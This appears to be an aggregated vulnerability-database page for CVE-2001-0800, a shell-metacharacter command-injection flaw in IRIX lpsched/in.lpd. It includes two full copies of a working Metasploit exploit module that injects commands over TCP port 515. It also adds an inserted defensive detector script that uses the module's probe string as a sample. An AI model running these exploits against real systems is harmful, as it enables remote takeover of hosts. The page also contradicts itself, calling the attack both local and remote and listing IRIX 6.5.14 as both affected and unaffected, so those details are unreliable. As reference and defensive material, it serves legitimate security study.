CVE-2001-0800
CVSS 10.0
Published: 2001-12-06 00:00:00
Last revised: 2008-09-05 16:24:57

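[Original] lpsched in IRIX 6.5.13f and earlier allows remote attackers to execute arbitrary commands via shell metacharacters.


[CNNVD] IRIX lpsched command execution vulnerability (CNNVD-200112-058)

        A vulnerability exists in lpsched in IRIX 6.5.13f and earlier. Local users can execute arbitrary commands via shell metacharacters.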

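- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0800
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0800
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-058
(official data source) CNNVD

- Other links and resources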

ftp://patches.sgi.com/support/free/security/advisories/20011003-02-P
(VENDOR_ADVISORY)  SGI  20011003-02-P
http://www.lsd-pl.net/files/get?IRIX/irx_lpsched2
(UNKNOWN)  MISC  http://www.lsd-pl.net/files/get?IRIX/irx_lpsched2
http://www.securityfocus.com/bid/27566
(UNKNOWN)  BID  27566

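- Vulnerability information

IRIX lpsched command execution vulnerability
Critical Unknown
2001-12-06 00:00:00 2005-10-20 00:00:00
Remote
        A vulnerability exists in lpsched in IRIX 6.5.13f and earlier. Local users can execute arbitrary commands via shell metacharacters.

- Advisories and patches
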

- Vulnerability information (10033)

Irix LPD tagprinter Command Execution (EDBID:10033)
irix remote
2001-09-01 Verified
515 H D Moore
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Irix LPD tagprinter Command Execution',
			'Description'    => %q{
				This module exploits an arbitrary command execution flaw in
				the in.lpd service shipped with all versions of Irix.		
			},
			'Author'         => [ 'optyx', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2001-0800'],
					['OSVDB', '8573'],
					['URL',   'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
				],
			'Privileged'     => false,
			'Platform'       => ['unix', 'irix'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 512,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic telnet',
						}
				},		
			'Targets'        => 
				[
					[ 'Automatic Target', { }]
				],
			'DisclosureDate' => 'Sep 01 2001',
			'DefaultTarget' => 0))
			
		register_options(
			[
				Opt::RPORT(515)
			], self.class)
	end

	def check
		connect
		sock.put("T;uname -a;\n")
		resp = sock.get_once
		disconnect
		
		if (resp =~ /IRIX/)
			print_status("Response: #{resp.strip}")
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end
	
	def exploit
		connect
		sock.put("T;#{payload.encoded};\n")
		handler
		print_status("Payload: #{payload.encoded}")
	end

end
		

- Vulnerability information (16877)

Irix LPD tagprinter Command Execution (EDBID:16877)
irix remote
2010-10-06 Verified
0 metasploit
##
# $Id: tagprinter_exec.rb 10561 2010-10-06 00:53:45Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Irix LPD tagprinter Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution flaw in
				the in.lpd service shipped with all versions of Irix.
			},
			'Author'         => [ 'optyx', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10561 $',
			'References'     =>
				[
					['CVE', '2001-0800'],
					['OSVDB', '8573'],
					['URL',   'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
				],
			'Privileged'     => false,
			'Platform'       => ['unix', 'irix'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 512,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Automatic Target', { }]
				],
			'DisclosureDate' => 'Sep 01 2001',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(515)
			], self.class)
	end

	def check
		connect
		sock.put("T;uname -a;\n")
		resp = sock.get_once
		disconnect

		if (resp =~ /IRIX/)
			print_status("Response: #{resp.strip}")
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		sock.put("T;#{payload.encoded};\n")
		handler
		print_status("Payload: #{payload.encoded}")
	end

end
		

- Vulnerability information (F82229)

Irix LPD tagprinter Command Execution (PacketStormID:F82229)
2009-10-27 00:00:00
H D Moore  
exploit,arbitrary
irix
CVE-2001-0800

This Metasploit module exploits an arbitrary command execution flaw in the in.lpd service shipped with all versions of Irix.


- Vulnerability information

8573
IRIX lpsched Shell Metacharacter Remote Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- Vulnerability description

IRIX contains a flaw that may allow a remote attacker to execute arbitrary commands. The problem is that the 'lpsched' binary does not validate user-supplied input. By passing shell metacharacters to the binary, it is possible for a remote attacker to execute arbitrary commands resulting in a loss of integrity.
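
A defensive check for the input-validation gap described above, as an added example that is not code from this page, SGI, or the Metasploit project: it classifies the first line a client sends to an LPD listener on TCP/515 and flags requests that are not well-formed RFC 1179 commands or that carry shell metacharacters. The names `classify_lpd_request` and `flagged?`, the metacharacter set, and the sample inputs are assumptions made for illustration.

```ruby
# Assumption: a well-formed request follows RFC 1179, i.e. one command octet
# 0x01..0x05, a queue name, optional space-separated operands, then LF.
RFC1179_COMMANDS = {
  1 => 'print-waiting-jobs',
  2 => 'receive-job',
  3 => 'queue-state-short',
  4 => 'queue-state-long',
  5 => 'remove-jobs'
}.freeze

# Characters a shell interprets; none belongs in a queue name or operand.
SHELL_META = /[;&|`$<>(){}\\'"*?!\r]/.freeze

# Returns the decoded command name, the queue name and a list of findings.
def classify_lpd_request(raw)
  findings = []
  line, terminator, _rest = raw.b.partition("\n")
  findings << :missing_lf if terminator.empty?
  return { command: nil, queue: nil, findings: findings << :empty_request } if line.empty?

  command = RFC1179_COMMANDS[line.getbyte(0)]
  findings << :unknown_command_octet unless command

  operands = line.byteslice(1..-1) || ''
  queue = operands.split(' ', 2).first.to_s
  findings << :shell_metacharacter if operands.match?(SHELL_META)
  findings << :non_printable_operand if operands.match?(/[^\x20-\x7e]/n)

  { command: command, queue: queue, findings: findings }
end

# True when the request should be logged or dropped before it reaches the spooler.
def flagged?(raw)
  !classify_lpd_request(raw)[:findings].empty?
end

# Constructed sample inputs (not captured traffic).
SAMPLES = {
  legit_queue_state: "\x03lp\n",
  legit_receive_job: "\x02lp\n",
  page_check_probe:  "T;uname -a;\n" # the string the module's check method sends
}.freeze

SAMPLES.each do |name, raw|
  puts "#{name}: #{classify_lpd_request(raw)[:findings].inspect}"
end
```

The same classification can run in a filtering proxy or over reassembled TCP/515 streams; the probe string from the module trips both the command-octet and the metacharacter checks.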

- Timeline

2001-09-01 Unknown
2001-09-01 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, SGI has released a patch to address this vulnerability.

- Related references

- Vulnerability author

- Vulnerability information

IRIX 'lpsched' Remote Command Execution Vulnerability
Input Validation Error 27566
Yes No
2001-11-09 12:00:00 2008-02-04 02:56:00
Last Stage of Delirium is credited with discovering this issue.

- Affected program versions

SGI IRIX 6.5.13 m
SGI IRIX 6.5.13 f
SGI IRIX 6.5.12 m
SGI IRIX 6.5.12 f
SGI IRIX 6.5.11 m
SGI IRIX 6.5.11 f
SGI IRIX 6.5.10 m
SGI IRIX 6.5.10 f
SGI IRIX 6.5.9 m
SGI IRIX 6.5.9 f
SGI IRIX 6.5.8 m
SGI IRIX 6.5.8 f
SGI IRIX 6.5.7 m
SGI IRIX 6.5.7 f
SGI IRIX 6.5.6 m
SGI IRIX 6.5.6 f
SGI IRIX 6.5.5 m
SGI IRIX 6.5.5 f
SGI IRIX 6.5.4 m
SGI IRIX 6.5.4 f
SGI IRIX 6.5.3 m
SGI IRIX 6.5.3 f
SGI IRIX 6.5.2 m
SGI IRIX 6.5.2 f
SGI IRIX 6.5.1
SGI IRIX 6.5
SGI IRIX 6.5.14 m
SGI IRIX 6.5.14 f

- Unaffected program versions

SGI IRIX 6.5.14 m
SGI IRIX 6.5.14 f

- Vulnerability discussion

The 'lpsched' utility in IRIX is prone to a remote shell command-execution vulnerability.

Successfully exploiting this issue can allow arbitrary commands to run in the context of the affected user.

- Exploitation

To exploit this issue, attackers can use readily available networking utilities.

The following exploit code is available as a module for the Metasploit Framework:

- Solution

Please see the references for more information.

- Related references

 

 
